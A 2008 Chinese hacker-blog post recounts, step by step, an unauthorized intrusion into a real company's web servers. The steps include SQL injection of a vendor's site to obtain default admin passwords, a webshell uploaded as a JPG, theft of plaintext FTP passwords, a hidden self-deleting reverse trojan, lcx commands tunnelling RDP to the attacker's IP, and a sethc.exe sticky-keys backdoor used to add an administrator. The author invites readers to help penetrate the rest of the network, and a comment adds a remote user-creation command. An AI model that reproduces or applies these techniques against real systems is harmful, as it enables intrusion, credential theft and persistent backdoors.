渗透清华同方

    [晴 March 10, 2008 20:33 | by ]
此文章已发表在《黑客手册》2008年第3期杂志上
后经作者提交邪恶八进制论坛,如转载请务必保留此信息!
文章作者:冰sugar[J.S.T]&[E.S.T]

事出有因

我兄弟买了台本本叫我过去看看,兄弟说买的是清华同方电脑,貌似还不错吧,双核的配置,1G内存60G硬盘,还加上内置的摄像头。花了6000块大洋呢,兄弟心好痛,不过钱是他舅舅付钱的,他当然高兴咯。哈哈,以后就可以和兄弟共享一台本本了。不过用不了几天,真是毛病多多呀,一会儿是电源问题一会儿是主板问题,搞得兄弟都高兴不起来。看来,清华同方电脑等同于神州电脑,哎,便宜真没好货。想为兄弟出口气,于是便有了下文。

初入虎穴

先从百度搜搜,看看能不能找一些关于清华同方的一些资料。如图1

Highslide JS


一个清华同方股份站排在第一的应该不是普通站。就直接进去瞧瞧,进去逛了好几分钟,发现这主站都是静态页面没有什么好利用因为网页大多数是自己写的,好不容易找了一个sql注入点且是public,但又列不出目录没有利用价值,只好在主站逛逛!找找图片的链接里面有个admin引起了我的注意

Highslide JS


看看我今天的RP是不是很好,能不能找个后台利用sql注入得到账号密码,或是用万能钥匙('or'='or')看看能不能进,输入后台地址出现了让我傻眼的事情

Highslide JS


Admin文件夹下需要用户验证才能进入,真是个BT设置。看来站长也有些防范意识。主站下不了手我们就旁站,进入旁注查询(http://www.seologs.com/ip-domains.html

Highslide JS


但是后来我一一看了一下,其中一个站是打不开的,而其余的站则挂了几张简介的静态页,其余的什么都没有,这条路也走不通。难道我们放弃吗?不能就这样放弃了吧,太没有黑客精神了吧!从网站入手是没戏了,看看是否可以从其他地方入手,不知道服务器存在什么漏洞,尝试了各种溢出服务器还算牢固,利用IIS权限设置漏洞扫描是否存在低级的IIS配置错误。扫了以后才发现原来服务器处于内网如图5,都没有显示IIS的版本,只显示0。

Highslide JS


看来即使有IIS设置漏洞都没有办法成功拿到Webshell。还是回到主站看看,有什么可以再次利用的。这次糊里糊涂的进了清华同房智能卡产品的网站,如图

Highslide JS


心里想想主站进不了先进进分站看看,或许还有其他的突破。这个站倒有很多动态网页,随手输入个“'”,如图,看来是做了防注入了。看来现在已经不是注入时代了。找找有没有什么好利用的,用啊D扫了一下后台,结果发现后台是哪么简单。如图,

Highslide JS


Highslide JS


还是一样尝试了默认密码,如 admin,admin888,123456,"or"="or"等等,都没效果。有一个让我觉得奇怪的事情,一个清华同方智能卡的后台竟然发着不是自己的后台信息图片

Highslide JS


我的第一反应就是他的站是给图上这个信息网站承接做的,给一个专业做网站的公司,他必定会有一个他们公司统一的后台管理员的账号密码。这时,赶紧进入做网站公司的站,找他的建站范例,找到了其中的一个站,而这个站又没有修补sql注入漏洞,成功的拿下了数据库并下载回来。看来这就是专业建站公司的建站风格了。我们利用拿回来的账号密码进行登陆。

Highslide JS


轻松webshell

这时豁然开朗,我猜的没错,账号密码果然默认,而且网站的管理员也并没有修改

Highslide JS


进了后台,要的就是webshell,看看网站后台有没有上传和备份,因为现在大多数的企业网站已经不能直接上传个脚本文件了。还是不失所望,找到了上传和备份页面。如图

Highslide JS


Highslide JS


就上传个jpg图片格式的脚本木马在进行后台备份,简单的操作在这里就不一一介绍了,如果不懂的朋友去看看以前的书。就这样简单的获得了webshell。

Highslide JS


继续我的权限之路

虽然拿到了webshell,但是我们还是不肯罢休,看看我们的webshell要怎么利用?首先翻一翻,看看有什么好的东西可以提升权限的,如图Scripting.FileSystemObject,wscript.shell组建都可以用。这下可就好办了,传个cmd上去看看。

Highslide JS


把本地的cmd上传到C:\Documents and Settings\All Users\Documents\ 里面,默认这个文件夹都有执行权限,而且是所有用户的执行权限。一看就知道哦是内网的,接着看看net.exe 有没有被管理员禁掉了。在对方的CMD上执行了net user显示了对方的用户,结果哗啦啦的帐户出来!

Highslide JS


有执行了net start (查询服务器开启的服务)如图,再看看能力用的有MSSQLSERVER,MySql,杀软装了诺顿。再看看貌似没有su,(如果装了serv-u那提权就爽多了,至少拿终端权限机率大多了)

Highslide JS


不过有mysql,看看我今天的运气如何,后来真让我找出了密码,如图

Highslide JS


但是内网的mysql俺没碰到过,对mysql又很不懂,看看色色兄又没在线,还是换种提权方式吧,初看服务器,webshell的权限还算蛮大的,能浏览其他盘目录,甚至有修改权限。

到服务器到处逛逛后来又发现了CesarFTP,这个继serv-u后又一款新型FTP服务器,也不懂这是什么FTP,去网站找找资料,发现这款FTP软件存在一个严重漏洞,在配置文件里保存明文密码,明文密码保存在本软件安装根目录下的settings.ini,马上到服务器上找settings.ini文件,真的找到了此文件,找到配置文件速速在本地装个CesarFTP覆盖文件,后来发现里面有帐户能直接连ftp,下载个flashxp连上去,直接浏览C、D盘。如图

Highslide JS


但是这款FTP有没有执行权限,就只能呆呆的看着C、D盘的东西,光看得到吃不到,MYSQL找到密码又连不上,而MSSQL也找不到什么可以利用的,真是郁闷之极。翻着里面的Program Files目录,找能利用的第三方软件。虽然装了一些软件,但是能利用的却没有几个,手上大概能利用也只是FTP,其他都没用。后来逛逛启动项里发现里面的目录可写,想想其实在C:\Documents and Settings\All Users\「开始」菜单\程序\启动\,下直接传个反弹木马上去就可以了。等服务器重启后咱们还是能拿到服务器权限。

Highslide JS


把木马设置为运行自动删除本身,且把木马的属性修改为隐藏。这样就万无一失了。等过了几天发现服务器还是没有重启,没有那个耐性在继续下去,想来个速战速决。

再次突破

还是回到webshell,慢慢找利用的地方。找了许久,发现〖终端端口-自动登录〗里竟然明文显示管理员账号密码,如图,读取注册键值 "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"

Highslide JS


看来有戏了。服务器的组件支持wscript.shell,能执行CMD,虽然服务器在内网那我们就用LCX映射出来,我们本地连接。首先在自己机子的cmd下运行,lcx.exe -listen 51 3389意思是监听51端口并转发到3389端口,然后在肉鸡上运行 lcx.exe -slave 你的IP 51 肉机IP 3389。说干就干,在服务器上执行了。如图。

Highslide JS


本地监听51端口并转发。连本地127.0.0.1,结果真的连上来了。输入账号密码,提示错误。不知道是不是管理员的蜜罐,TMD,对了,我们不是还有FTP吗!而且还有C、D盘的权限
看看能下他管理员的SAM密码,然后本地爆破。但是下载不下。

Highslide JS


Highslide JS


后来想到了前段时间玩的很火的按5下SHIFT的后门。我们现在有C盘的权限,不如我们替换C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache下的sethc.exe 。我们就用cmd.exe做试验,如果能替换我们直接添加个管理员,连上FTP替换好了文件。在替换之前改sethc.exe的名字,备份下sethc,然后替换。连上服务器,按照要求按了SHIFT五下。出现了,并且闯将了用户,如图。

Highslide JS


建了个账户还是回webshell里看看,比较保险。如图

Highslide JS


用刚建立的帐户连服务器,这下我们终于拿到了服务器的最高权限了,而且还是双核的。如图

Highslide JS


此次的入侵也到了结束,告一段落了。

入侵总结

本次入侵并没有什么技术,主要的是结合服务器的缺陷和服务器上所装的软件,和微软设计上的缺陷(SHIFT),拿下了服务器,虽然拿下了服务器但是我并没有搞什么破坏。但是想继续渗透下整个清华同方的整个网络,如果有兴趣的也可以加我Q一同联合,可以在我的论坛www.jbhack.com.cn或者到我blog:qq3389.cn跟我联系!希望大家在新的一年内肉鸡多多,礼物多多,技术也多多。
Technology | Comments(1) | Trackbacks(0) | Reads(10132)
smias
March 11, 2008 12:47
FTP明文密码而且C:\完全控制,.!
有没试过:
quote site exec net.exe user smile smile /add

FTP替换sethc.exe思路不错,赞一个...
Pages: 1/1 First page 1 Final page
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive